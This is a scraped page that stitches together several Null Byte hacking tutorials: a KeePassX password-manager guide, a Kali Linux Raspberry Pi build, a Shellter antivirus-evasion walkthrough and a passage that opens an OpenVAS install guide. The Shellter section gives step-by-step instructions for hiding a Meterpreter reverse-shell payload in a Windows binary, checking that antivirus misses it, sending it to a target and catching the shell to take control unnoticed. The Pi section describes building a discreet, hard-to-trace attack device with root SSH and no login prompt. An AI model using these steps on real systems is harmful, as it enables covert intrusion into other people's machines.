Required)How To:Blur out a car's license plate in Final Cut ProHow To:Design a license plate in PhotoshopHow To:Top 10 Browser Extensions for Hackers & OSINT ResearchersHow To:Track Down a Tinder Profile with Location Spoofing on Google ChromeHow To:Acquire legal ownership of an abandoned carHow To:Advanced Penetration Testing - Part 1 (Introduction)How To:How Anonymous Texting Can One Day Help You Avoid Tow Trucks, Parking Tickets, & Vandalized CarsHow To:Make a cool recycled license plate mail boxHow To:Play license plate bingoNews:Comparing the Best International Data Plans from All Major US CarriersHow To:Exploit Recycled Credentials with H8mail to Break into User AccountsNews:Rosalind’S Ethiopian RestaurantHow To:Obtain Valuable Data from Images Using Exif ExtractorsHow To:Conduct OSINT Recon on a Target Domain with Raccoon ScannerHow To:Find Your HTC One or Other Android Phone with a Text MessageHow To:Send SMS Messages with PythonHow To:Permanently Erase Data So That It Cannot be RecoveredNews:A Simple TNT Pressure Plate Trap That Actually Works!Secure Your Computer, Part 3:Encrypt Your HDD/SSD to Prevent Data TheftNews:April NPD Video Game SalesDIY Lab Equipment:Make a Magnetically Controlled Cigar Box Stir PlateQuick Tip:How To Make a Desktop Computer and Table LampNews:Find licensed professional counselors CANews:A Youth Sports Growth Plate Injury: Sever DiseaseNews:Infrared LEDs Protect Your License Plate Number from Police CamsCoding Fundamentals:An Introduction to Data Structures and AlgorithmsHow To:Spy on Your "Buddy's" Network Traffic: An Intro to Wireshark and the OSI Model
Wi-Fi Hacking Β« Null Byte :: WonderHowTo
No content found.
Mac for Hackers: How to Manage Your Passwords with KeePassX Β« Null Byte :: WonderHowTo
Now that we've learned aboutkeeping all our data safe with encryption, it's time to continue progressing throughgetting your Mac set up for hacking.Just like most other people, we hackers have a lot of credentials to manage. We're also human, so we have a hard time creating random difficult-to-brute-force passwords. So instead of rolling upallof our passwordswith Diceware, we'll let our machine do the work for usβ€”both in guarding the passwords and generating them. For this, we'll use a password manager.There are many password managers on the market, and some of the heavy hitters for macOS areLastPass,1Password, andKeePassX. I prefer KeePassX because it's open source, very secure, works on almost everything, and allows me control over my key database and key file. KeePassX uses either 256-bit AES or Twofish to encrypt the password vault, and has had only a couple of CVEs (Common Vulnerabilities and Exposures) in its lifetime.Previously:How to Create an Encrypted Disk ImageStep 1: Get KeePassXOur first step is todownload KeePassX from their website. Once we have the disk image, we will mount it and drag KeePassX into our Applications folder.On most macOS systems, we will not be able to run this app right out of the box due to the app being from an unidentified developer. Since KeePassX is unsigned, we will need toenable a security exception. If you are not comfortable with this, you may want to consider a different password manager.Don't Miss:How to Open Third-Party Apps from Unidentified Developers in macOSNavigate to KeePassX in your Applications folder, then control-click (or right-click) on the KeePassX icon and select "Open" on the prompt. You will then be greeted with this screen:Not much going on here, but that will change.If you already have a KeePass database, you can open it now by selecting "Database" in the menu bar and clicking on "Open database." If you don't already have a database, that's okayβ€”just keep on reading.Step 2: Create a New Key DatabaseWith the KeePassX window selected, go to "Database" in the menu bar and select "New database." For this tutorial, I will be using a key file along with a password. Without the key file, the database is useless.If you lose the key file, you will lose all of your passwords. I keep a backup of my key file somewhere safe, and a copy of it on a USB key. If I stored the key file with the key database and an attacker gained access to my system, they could attempt to brute-force my database. Better safe than sorry.Tick the "Password" box and enter a strong password in the password field. I suggestusing Diceware to create this password, since it's imperative for this one to be super strong and random.Next, tick the "Key file" box (if you intend to use a key file) and click the "Create" button. You will be prompted with a save dialog. Select a location on your drive and save the key fileβ€”KeePassX will then generate the key file for you. If you are happy with your settings, click "OK" to continue.Step 3: Add Groups to Your DatabaseWe now have a fresh key database, but we don't have any groups other than the default "Root" group, which houses everything. Groups are basically just folders to organize your passwords in whatever manner you want.Since only having a "Root" group is extremely disorganized, we'll go ahead and create some more groups to keep things nice and tidy. Control-click (or right-click) on the folder labeled "Root" and select "Add new group." You could also select "Groups" in the menu bar and select "Add new group."Fill out the name field, add notes if you need them. If you have a password revocation policy, tick the "Expires" box and enter a date and time. Keep in mind that this will expire all passwords in that group at that time, and will remind you to select new ones.When you are done editing a group, click on the "OK" button on the bottom-right of the window.If you want more groups, go ahead and create them. You can also create subgroups within groups, if you want to be really OCD about them.Step 4: Add EntriesNow that we have some groups, it's time to start generating some credentials.Select a group, then pressCommand Nor go to "Entries" in the menu bar and select "Add new entry." Enter the title, your username, and click on the "Gen." button to generate a new password. Here you will be able to select password rules. I selected the special characters button in the character types, but you can use whatever you wantβ€”just hit "Accept" when it's to your liking.Fill out the rest of the fields as you see fit, then click the "OK" button at the bottom of the window to save your entry.Repeat these steps for all of the credentials you have and you will have unique, strong passwords for all of your accounts! Not necessarily as strong asDiceware passwords, but they're the next best thing.Step 5: Use the DatabaseIn order to use a stored password, simply select the entry you need and pressCommand Cto copy your password. Then useCommand Vto paste the password into the appropriate field of the website, app, etc. You don't have to worry about the contents of your clipboard being read due to KeePassX auto-clearing the clipboard after 10 seconds. While KeePassX does offer an autofill option, it is still in experimental state and beyond the scope of this article.Stay Tuned for More Hacking with Mac Guides!If you've beenfollowing along with the series, you now have a solid foundation to start building up from. Your hard drive is encrypted, and your credentials are safe. Coming up next, we'll be getting familiar with the terminal, getting package management working, and working with vim, eventually culminating in a strong hacking environment based on macOS.Next Up:How to Install iTerm2 Using the TerminalFollow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byMile Atanasov/123RF; Screenshots by Barrow/Null ByteRelatedMac for Hackers:How to Get Your Mac Ready for HackingNews:8 Tips for Creating Strong, Unbreakable PasswordsHacking macOS:How to Dump 1Password, KeePassX & LastPass Passwords in PlaintextHacking macOS:How to Dump Passwords Stored in Firefox Browsers RemotelyHow To:Enable Two-Step Verification on Your Apple ID for iCloud, App Store, & iTunesMac for Hackers:How to Create an Encrypted Disk ImageHow To:Easily Bypass macOS High Sierra's Login Screen & Get Root (No Password Hacking Required)Mac for Hackers:How to Install iTerm2 Using the TerminalHow To:Hack into a Mac Without the PasswordHow To:Dashlane & LastPass Can Now Automatically Strengthen All of Your Weak PasswordsHow To:Protect Yourself from the Biggest Jailbreak Hack in HistoryMac for Hackers:How to Enable Full Disk Encryption to Protect Your DataAdvice from a Real Hacker:How to Create Stronger PasswordsHow To:Get Your Hacked Facebook Account Back.How To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address SpoofingHacking Windows 10:How to Steal & Decrypt Passwords Stored in Chrome & Firefox RemotelyHow To:Protect Yourself from macOS High Sierra's Glaring Empty-Password Security FlawHow To:Disable Password Prompts When Downloading Free Apps in the Mac App StoreHow To:The Beginner's Guide to Defending Against Wi-Fi HackingNews:Malware Targets Mac Users Through Well-Played Phishing AttackHow To:Hack Mac OS X Lion PasswordsHow To:How Hackers Take Your Encrypted Passwords & Crack ThemHow To:How Hackers Steal Your Internet & How to Defend Against ItMastering Security, Part 1:How to Manage and Create Strong PasswordsGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingHow To:Bypass a Local Network Proxy for Free InternetGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingSecure Your Computer, Part 2:Password-Protect the GRUB Bootloader on Dual-Booted PCsRainbow Tables:How to Create & Use Them to Crack PasswordsHow To:Chain VPNs for Complete AnonymityGoodnight Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingHow To:Hack Wireless Router Passwords & Networks Using HydraHow To:Create Strong, Safe PasswordsGoodnight Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 7 - Legal Hacker
How to Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux Β« Null Byte :: WonderHowTo
TheRaspberry Piis a credit card-sized computer that can crack Wi-Fi, clone key cards, break into laptops, and even clone an existing Wi-Fi network to trick users into connecting to the Pi instead. It can jam Wi-Fi for blocks, track cell phones, listen in on police scanners, broadcast an FM radio signal, andapparently even fly a goddamn missile into a helicopter.The key to this power is a massive community of developers and builders who contribute thousands of builds for the Kali Linux and Raspberry Pi platforms. For less than a tank of gas, aRaspberry Pi 3buys you a low-cost, flexible cyberweapon.A cyberweapon that fits anywhere? Name something else in your pocket that creates a fake AP in Czech.Image by SADMIN/Null ByteOf course, it's important to compartmentalize your hacking and avoid using systems that uniquely identify you, like customized hardware. Not everyone has access to a supercomputer or gaming tower, but fortunately one is not needed to have a solid Kali Linux platform.With over 10 million units sold, the Raspberry Pi can be purchased in cash by anyone with $35 to spare. This makes it more difficult to determine who is behind an attack launched from a Raspberry Pi, as it could just as likely be a state-sponsored attack flying under the radar or a hyperactive teenager in high school coding class.Thinking Like an AttackerThe Raspberry Pi has several unique characteristics that make it a powerful and easily accessible tool in a penetration tester's kit. In particular, the Pi is cheap and the components cost as little as a Lego set. Also, the Raspberry Pi is discreet; It's small, thin, and easy to hide. And thanks to running Kali Linux OS natively, it is flexible and able to run a broad range of hacking tools from badge cloners to Wi-Fi cracking scripts. By swapping the SD card and adding or removing components like apacket-injection capable wireless adapter, the Raspberry Pi can be customized to suit any situation.Raspberry Pi + projector = Kali on a huge screen.Image by SADMIN/Null ByteThe Raspberry Pi on OffenseFirst, it's important to manage your expectations and remain reasonable when selecting a Raspberry Pi as a hacking platform. The Raspberry Pi is not a super computer and doesn't have a tremendous amount of processing power. It's not well-suited to processor intensive tasks like brute-force WPA password cracking, or acting as a network attack as the connection is too slow to fool users. That being said, the Raspberry Pi is perfectly suited to many attack environments. We simply offload these tasks to bigger computers and use the Pi as a data collector.An active Raspberry Pi Wi-Fi jamming setup.Image by SADMIN/Null ByteIn my experience, the Raspberry Pi works exceptionally well as a Wi-Fi attack platform. Due to its small size and large library of Kali Linux-based attack tools, it's ideal for reconnaissance and attacking Wi-Fi networks. Our offensive Kali Linux build will be geared towards anonymous field auditing of wired and wireless networks.The Basic Components of Our Attack SystemHere are the basic components needed to build our Pi attack system, and why we need them. If you're just starting out,this excellent Raspberry Pi Kitfrom CanaKit includes most of what you need to get your Pi set up.Raspberry Pi: TheRaspberry Pi 3is the platform of these builds, coordinating and controlling all other components. Its low power consumption and flexible capabilities allow it to serve as a platform for running Linux-based operating systems besides Kali.Raspberry Pi 3.Image by SADMIN/Null ByteCommand and control (C2) wireless card: The purpose of the C2 wireless card is to automatically connect the Pi to the command AP (access point) such as your phone hotspot or home network. This allows remote control of the Pi discreetly or from a great distance via SSH (Secure Shell) or VNC (Virtual Network Computing). Fortunately for us, the Raspberry Pi 3 has a Wi-Fi card internally, but a wireless network adapter can also be added to a Raspberry Pi 2.Wireless attack card:: Our attack wireless card will be a Kali Linux-compatible Wi-Fi adapter capable of packet injection. This will be our attack surface and can be along-range,short-range, or directional antenna depending on attack requirements. You can find a greatguide to choosing one here.Don't Miss:Choosing a Wireless Adapter for HackingOS build cards: Themicro SD cardhosts the OS and brain of the computer and can be precisely configured for any desired environment. By creating customized cards, it is possible to rapidly change the configuration and function of a Raspberry Pi by simply swapping the card and components.Computer: You will also need a computer to download the firmware to load onto the micro SD card.Power supply: The Raspberry Pi uses a standard Micro-USB power supply, and nearly any Android phone charger or battery pack will work to power a Pi. This allows for a number of different battery configurations to suitlong-endurance reconnaissanceorcontinuously powered operations.My Raspberry Pi hacking kit.Image by SADMIN/Null ByteEthernet cable (optional): AnEthernet cableallows you to bypass wireless authentication by directly interfacing with local networks to which you have physical access. Specialized attacks likePoisonTapcan also take advantage of ethernet interfaces to infiltrate computers.Bluetooth keyboard (optional): ABluetooth keyboardis helpful for interfacing when you have an HDMI connection.Case (optional): Every Pi needsa case to protect it.Build ConsiderationsIn designing this tutorial, I considered two primary modes in which you would be operating the Raspberry Pi. In ouropen configuration, the Raspberry Pi is connected to a display via HDMI cord with inputs running through a wireless mouse and keyboard. In ourtactical configuration, you will use a laptop or smartphone to access the Raspberry Pi remotely via SSH. By connecting the Pi to our phone's hotspot or a nearby friendly AP, we can access the Raspberry Pi while still being able to use cellular data in the field.(Top) Lab configuration: Output over HDMI, input via Bluetooth keyboard. (Bottom) Tactical Configuration: Kali Linux via SSH.Images by SADMIN/Null ByteHow to Set Everything UpIn this guide, I'll show the steps needed to set up a Raspberry Pi 3 as a basic hacking platform with Kali Linux. I'll go over how to select a build to install, writing the disc image to a micro SD card, and the steps to run after first setting up your Pi. We'll update Kali Linux to the latest version to ensure everything works correctly, change the default SSH keys, and take care of some housekeeping like changing the admin password.Raspberry Pi in action connected to an HDMI output.Image by SADMIN/Null ByteAs a note, there are many ways to configure Kali on a Raspberry Pi 3. Some include touchscreens, some are completely headless (accessed via network connections without a keyboard or display), and others use the internal Wi-Fi card to create a hotspot for remote control of the Pi. In selecting this build, I discounted any designs that included a power-hungry and fragile touchscreen or additional hardware, and settled a version optimized for our two different C2 scenarios.Step 1: Download Kali Linux Image for the Raspberry PiHead toOffensive Securityand download the latest Kali Linux image for the Raspberry Pi. As of this writing, it is "RaspberryPi 2 / 3" on version 2.1.2.Step 2: Flash the Image to the Micro SD CardYou can use a tool likeApplePiBaker for MacorEtcherto load your Kali image onto your SD card, but sometimes these can result in errors. To prevent that, we'll cover how to do this via Terminal on a Mac. If you use Windows, you can useWin32 Disk Imagerto put your image on the card.On a Mac, before plugging in your SD card, run the following in Terminal:df -hThis will display a list of all the disks attached to your system. Attach your SD card and run the command again, and note the filesystem name of your SD card (it's the one that wasn't there before). It should look like "/dev/disk2s1" and you should be very careful not to mix this up in the next steps, since doing so could overwrite your hard drive.The available drives.Now, we'll use theddcommand to load the Kali image onto the card.Use "man dd" to see the rest of the operands for dd.First, let's unmount the partition so you can write to it with the following command, with "x" being the correct disk number:sudo diskutil unmount /dev/diskXNow we're ready to load Kali. Type, but don't run the command,sudo dd bs=1m if=and enter the location of the Kali Linux image we want to load onto the card. You can drag and drop the disk image into the window to show the file path. After that, type a space, thenof=/dev/rdiskand the number of the disk from before.If there is an "s" after the initial disk number (like rdisk2s1), do not include the "s" or following number. So, "rdisk2s1" should look like "rdisk2." Here's what it should look like altogether:sudo dd bs=1m if=LocationOfKaliImage of=/dev/rdiskXPress enter to begin the process, and note thatdddoes not provide any on-screen information unless there is an error or it finishes. To view the progress during the transfer, you can typeCtrl T. Wait for the process to complete. You'll know the process is complete when you see a readout of bytes transferred over the time the process ran.It will look like the screenshot below (if you pressCtrl Ta few times during the transfer) when complete.Mashing Ctrl T to see the statusβ€”took 1,131 seconds to transfer!Step 3: Boot into Kali LinuxWhen finished, your SD card is ready to go! Insert the SD card into your Pi, connect it to HDMI, and attach your Bluetooth keyboard. Plug in the power source to boot into Kali Linux for the first time. To get to the desktop, your default login is "root" with "toor" being the password.Kali Pi with power, HDMI, Ethernet, Bluetooth receiver, and secondary wireless adapter attached.Image by SADMIN/Null ByteThe login process is a problem for autonomous control, and we will need to disable it later. This will let us plug our Pi in and immediately connect to it remotely without a screen.First boot of Kali.Image by SADMIN/Null ByteStep 4: Update Kali LinuxKali Linux is a special flavor of Debian Linux meant for penetration testing, and a favorite here on Null Byte. It's compatible with some of the best and most advanced tools available for wireless hacking, and flexible enough to support a large number of hacking builds. It's maintained by Offensive Security, and you'll need to update it to the latest version to make sure all the tools work properly.Before running, now is a good time to expand your installation to the size of the partition. To do so, run the following:resize2fs /dev/mmcblk0p2At the top right of the desktop, you'll see an option to connect to a nearby wireless network. Connect to your phone's hotspot or a friendly AP to fetch the update. Run the update by opening a terminal window and typing the following:apt-get update apt-get upgrade apt-get dist-upgradeYour Kali install is now up to date. Update the root password to something more secure than "toor" by typing:passwd rootThen enter a new password for your Kali Linux system.Step 5: Install OpenSSH ServerTo communicate with our Raspberry Pi from a computer or phone, we'll need to be able to log in. To do so, we can use SSH to connect via any Wi-Fi connection we share with the Pi. SSH, or the Secure Shell, is a network protocol that allows us to run commands remotely on a device. This means we don't need to plug in a screen to interact with our Pi.In a terminal, run the following to install openSSH server and update the runlevels to allow SSH to start on boot:apt-get install openssh-server update-rc.d -f ssh remove update-rc.d -f ssh defaultsThe default keys represent a huge vulnerability since anyone can guess them. Let's change them immediately by running the following commands:cd /etc/ssh/ mkdir insecure_old mv ssh_host* insecure_old dpkg-reconfigure openssh-serverThis backs up the old SSH keys in another folder and generates new keys. Problem solved! Now let's make sure we can log in via root by typing:nano /etc/ssh/sshd_configThis will open your SSH configuration folder. Change this line:PermitRootLogin without-passwordTo this line instead:PermitRootLogin yesAnd typeCtrl Oto save the changes. If it already is correct, you don't need to change anything.Configuring sshd_config.Great! Let's restart the SSH service by typing:sudo service ssh restart update-rc.d -f ssh enable 2 3 4 5Finally, to test that we've got SSH working, use the following to see if SSH is currently running.sudo service ssh statusWe should see something like this if we are successful.If it's not, run this to get it going:sudo service ssh startIf you find SSH doesn't work, you can useraspi-configas a workaround. It's meant for Jessie, but it'll work on Kali, too. To use it, first clone fromGitHub, typesudo mount /dev/mmcblk0p1 /bootto mount the boot partition,cdto the directory, and runsudo bash raspi-config.Step 6: Create a Custom MOTDOf course, the speed and power of your hacking computer is directly related to how cool your message of the day (MOTD) banner is. You will be greeted with this upon successful login, andtraditionally is used with some ASCII artto spice things up.Create your own by typing:Nano /etc/motdDelete the contents and paste whatever you want to show up each time you log in.Save and exit nano by hittingCtrl O, thenCtrl X.Step 7: Test Login via SSHLet's try logging in from your home computer or laptop. Connect the Pi to the same wireless network your home or work computer is on. Run the commandifconfigon your Pi in terminal to learn your IP address.ifconfigIn the comments, some people mentioned getting an error here. If so, try runningsudo apt-get install net-toolsto determine if you don't have net-tools installed. Runifconfigagain and see if it works. Thanks toN1GHTANG31for pointing this out!Here, our IP is seen as 10.11.1.144.On your personal computer, type:ssh root@(your IP address)You should see your MOTD screen!A simple MOTD on successful SSH login.If not, you can run anarp-scanon a Mac to see a list of all available devices on the network if you need to find your Pi's IP address from personal computer.Step 8: Configure Autologin for Headless OperationSometimes, we will want to be able to log into an account other than root. Let's create a new user named WHT (or whatever you like) with root permission by running:useradd -m WHT -G sudo -s /bin/bashChange WHT's (or whatever you named it) password to something more secure than "toor":passwd WHTGreat! Now let's disable that login from before so we can boot directly into Kali, and our wireless cards will start up and connect to allow us remote control. To do so, type:nano /etc/lightdm/lightdm.confAnd delete the # before these lines:autologin-user=root autologin-user-timeout=0Save and exit withCtrl X. Next, type:nano /etc/pam.d/lightdm-autologinAnd you'll need to change this starting on line 11:# Allow access without authentication auth required pam_succeed_if.so user != root quiet_success auth required pam_permit.soTo this:# Allow access without authentication ###auth required pam_succeed_if.so user != root quiet_success auth required pam_permit.soSave and exit, and type "reboot" into terminal to restart your Pi to test.Test Your Build Against This ChecklistIn order to be considered field ready, your device must pass this checklist:The device starts up, logs on without prompting for a password, and starts SSH at boot allowing remote access.The device connects to the command AP to enable remote control (does this by default after connecting the first time).Runbesside-ngscript on attack antenna to test packet injection (tutorial for this).The Pi can be shutdown without corruption to the data on the micro SD card (boots normally after shutdown).Pass all the requirements? Then your Raspberry Pi is ready to hit the road. I'll be writing a series of Pi-based builds, so keep up with me by building your own Raspberry Pi-based Kali Linux computer.UsingFluxionwith a Raspberry Pi and projector.Image by SADMIN/Null ByteDon't Miss:How to Hack Wi-Fi: Capturing WPA Passwords by Targeting Users with a Fluxion AttackFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by SADMIN/Null ByteRelatedHow To:Hack WiFi Using a WPS Pixie Dust AttackHow To:Use VNC to Remotely Access Your Raspberry Pi from Other DevicesHow To:Boot Multiple Operating Systems on the Raspberry Pi with BerryBootHow To:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+How To:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableRaspberry Pi:Hacking PlatformHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Hack WPA WiFi Passwords by Cracking the WPS PINThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Build a Portable Pen-Testing Pi BoxHow To:Set Up Kali Linux on the New $10 Raspberry Pi Zero WHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019Raspberry Pi:Physical Backdoor Part 1How To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Turn Any Phone into a Hacking Super Weapon with the SonicHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords with CowpattyNews:These Guys Hacked Together a Raspberry Pi & Car Steering Wheel to Play Mario KartHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterRaspberry Pi:MetasploitHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Wardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesHow To:Install OpenVAS for Broad Vulnerability AssessmentHow To:Modify the USB Rubber Ducky with Custom Firmware
Hack Like a Pro: How to Evade AV Software with Shellter Β« Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!One key area on the minds of all hackers is how to evade security devices such as an intrusion detection system (IDS) or antivirus (AV) software. This is not an issue if you create your own zero-day exploit, orcapture someone else's zero-day. However, if you are using someone else's exploit or payload, such as one fromMetasploitorExploit-DB, the security devices are likely to detect it and spoil all your fun.Security software largely works by recognizing asignature of malicious software. If you can change the signature of your malware, payload, or shellcode, it will likely get past the AV software and other security devices.Don't Miss:Null Byte's Guides to Evading AV SoftwareI have written tutorials on usingVeil-EvasionandMetasploit's msfvenomto re-encode payloads to get past these devices, but no method is foolproof. The more options you have to re-encode your malware, the better chance you have of re-encoding malware to get past these devices.In this tutorial, we will be usingShellter. From my experience, it has proven more effective in re-encoding payloads to get past AV software than the other options.How Shellter WorksShellter is capable of re-encoding any native 32-bit standalone Windows application. Since we are trying to avoid AV detection, we need avoid anything that might look suspicious to AV software such as packed applications or applications that have more than one section containing executable code.Shellter is capable of taking any of these 32-bit Windows applications and embedding shellcode, either your custom payload or one available from such applications as Metasploit, in a way that is very often undetectable by AV software. Since you can use any 32-bit application, you can create almost an infinite number of signatures making it nearly impossible for AV software to detect.Step 1: Download & Install ShellterThe first step, of course, is to download and install Shellter. I will be running it on a Windows system, but Shellter can be run onKaliusingWine. I find that it is faster and easier to run Shellter in its native Windows environment. You can download Shellterhere.Step 2: Start ShellterNow that you have downloaded and installed Shellter, click on the executable in the Shellter directory. This should start the Shellter application like below.Step 3: Move a Windows Binary to the Shellter DirectoryTo test the effectiveness of Shellter at obfuscating the nature of a file, we will be using a well-known malicious file to AV software. And that would besbd.exe, aNetcatclone that has all the capabilities of Netcat, but also has the ability to encrypt the connection with AES.We will be embedding it with a Meterpreter payload from Metasploit. In essence, we will be taking a known 32-bit .exe file, embedding it with a known Meterpreter payload, and seeing whether AV software will detect either. I think that this is an excellent test of Shellter's capabilities as detection of either will trigger the AV software. Both will need to be obfuscated to bypass the AV scan.You can getsbd.exein the Windows binaries directory in Kali at:kali > cd /usr/share/windows-binarieskali > ls -lCopysdb.exeto the same directory as Shellter on the Windows system for simplicity.Step 4: Run ShellterNow let's go back to our Shellter application. EnterA(Auto) for the operation mode andN(no) for a version update. Since we just downloaded the current version, we don't need to update Shellter.Shellter will prompt you to enter the file that it is to re-encode. In our case, it issbd.exe. Remember, it only accepts 32-bit standalone applications.PE Target: sbd.exeIf your PE (portable executable) file is some place other than the Shellter directory, you will need to provide the absolute path here. Then just hit enter and Shellter begins its work.It eventually stops and, once again, prompts you for the type of payload you want to embed in the file. ChooseLfor "listed". Then, select1for the "meterpreter_reverse_tcp" payload.You will next be prompted for the LHOST (local) IP and the LPORT. Enter the IP of the local machine and any port you want. Then hit enter.Step 5: Embedding & Re-EncodingAfter a few minutes, Shellter completes the PE checksum and verification.When the verification is complete, your file is ready!Step 6: Test for DetectionNow that we have created the obfuscated shellcode, this is the moment of truth. We need to test to see whether AV software can detect it.On this system, I am usingthe Vipre AV software. I placed the re-encoded .exe file in a folder named "Exe folder" on my desktop, so let's scan just that folder with Vipre and see how well Shellter hid the malicious intent of that file.This scan only took a few seconds and Vipre does not detect any malicious files in the folder withsbd.exe. Success! Our malicious software is undetected by THIS AV software!This, of course, does not mean that all AV software will be unable to detect the malicious nature of our file. AV software from different publishers use different signatures and methods for detection. Some may be be able to detect the true nature of this file, but the key is to find an obfuscation technique that gets past the AV on the system you are targeting. This might require multiple attempts with different files, different encoding, and different payloads. Eventually, you are likely to find at least one combination that works.True hackers are nothing if not persistent.Step 7: Create Listener on KaliNow that we know the malicious shellcode is undetectable by at least Vipre, we can send the file to the target system. Before it is executed, we need to open a listener on our Kali system to connect.We can use Metasploit's multi-handler for this purpose. Start by opening the msfconsole by typing:kali > msfconsoleThen, use the multi-handler exploit and set the payload (windows/meterpreter/reverse_tcp), then set the local host (LHOST) and local port (LPORT) to the same as that embedded in your application above.Finally, typeexploitand the multi-handler will "catch" the connection from the payload when it is executed on the target, opening a Meterpreter shell unbeknownst to the AV software and the targeted user!Now with a Meterpreter prompt on the target system, we can use any of the Meterpretercommandsorscriptson that system to gain complete control.Shellter is just one more tool to evade AV software, but it may be the best. No one method works against all intrusion detection systems and antivirus software, but this one should be in your toolbox. We will continue to explore the capabilities of Shellter and other AV evasion software, so keep coming back, my tenderfoot hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:How to Change the Signature of Metasploit Payloads to Evade Antivirus DetectionHack Like a Pro:How Antivirus Software Works & How to Evade It, Pt. 1Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)Hack Like a Pro:How to Bypass Antivirus Software by Disguising an Exploit's SignatureHow To:Make a Fully Undetected Backdoored ProgramHack Like a Pro:How Antivirus Software Works & How to Evade It, Pt. 2 (Dissecting ClamAV)Best Android Antivirus:Avast vs. AVG vs. Kaspersky vs. McAfeeNews:What to Expect from Null Byte in 2015Hack Like a Pro:How to Evade AV Detection with Veil-EvasionHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 1 (Tools & Techniques)How To:Create an Undetectable Trojan Using a Domain NameHack Like a Pro:How to Use PowerSploit, Part 1 (Evading Antivirus Software)Advice from a Real Hacker:How to Know if You've Been HackedHack Like a Pro:How Antivirus Software Works & How to Evade It, Pt. 3 (Creating a Malware Signature in ClamAV)How To:Record a playing stream in AV Voice Changer SoftwareHacking macOS:How to Create an Undetectable PayloadHack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)Hack Like a Pro:The Basics of XORingAdvice from a Real Hacker:How to Protect Yourself from Being HackedNews:Hackers Have 92% Success Rate Hacking Gmail on AndroidHow To:Add a radio station to Replay AVTypoGuy Explaining Anonymity:A Hackers MindsetHack Like a Pro:The Ultimate Command Cheat Sheet for Metasploit's MeterpreterHow To:The Essential Skills to Becoming a Master HackerNews:Some Great Articles on Evading AV SoftwareLevitation Challenge:Evading ArrestNews:What does Pro Tools HD Native mean for you?
Install OpenVAS for Broad Vulnerability Assessment Β« Null Byte :: WonderHowTo
OpenVASis a powerful vulnerability assessment tool. Forked fromNessusafter Nessus became a proprietary product, OpenVAS stepped in to fill the niche. OpenVAS really shines for information gathering in large networks where manual scanning to establish a foothold can be time-consuming. OpenVAS is also helpful for administrators who need to identify potential security issues on a network.In this article, I will demonstrate the configuration and installation of OpenVAS, or Open Vulnerability Assessment System, in Kali Linux.Step 1: We're Going to Need a Shell for ThisThe first step is to open your favorite terminal emulator and become root by typingsudo su. In my case, I am using SSH to connect to my headless Kali box. While this will work on most machines running Kali Linux, you can set up your own Kali Linux hacking computeron the $35 Raspberry Pi. From here on out, I will be assuming that you are running as root.Don't Miss:How to Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxKali is a rolling distro. We want to be sure we have the most up-to-date package lists and the most up-to-date packages installed. So be sure to run the command:apt update && apt upgradeIn the screenshot above, it looks like I have some packages that are no longer required. If you encounter the same message, you can safely remove the unnecessary packages with:apt autoremove && apt cleanThis helps maintain a leaner system which is important in situations where disk space is tight. To clear out unused packages, useapt autoremove. To clear out .deb packages left over in your /var/cache/apt/archives directory, useapt clean.Step 2: Install the OpenVAS PackageLike most mainstream security tools, OpenVAS is available from the Kali repositories. To install it, simply issue the 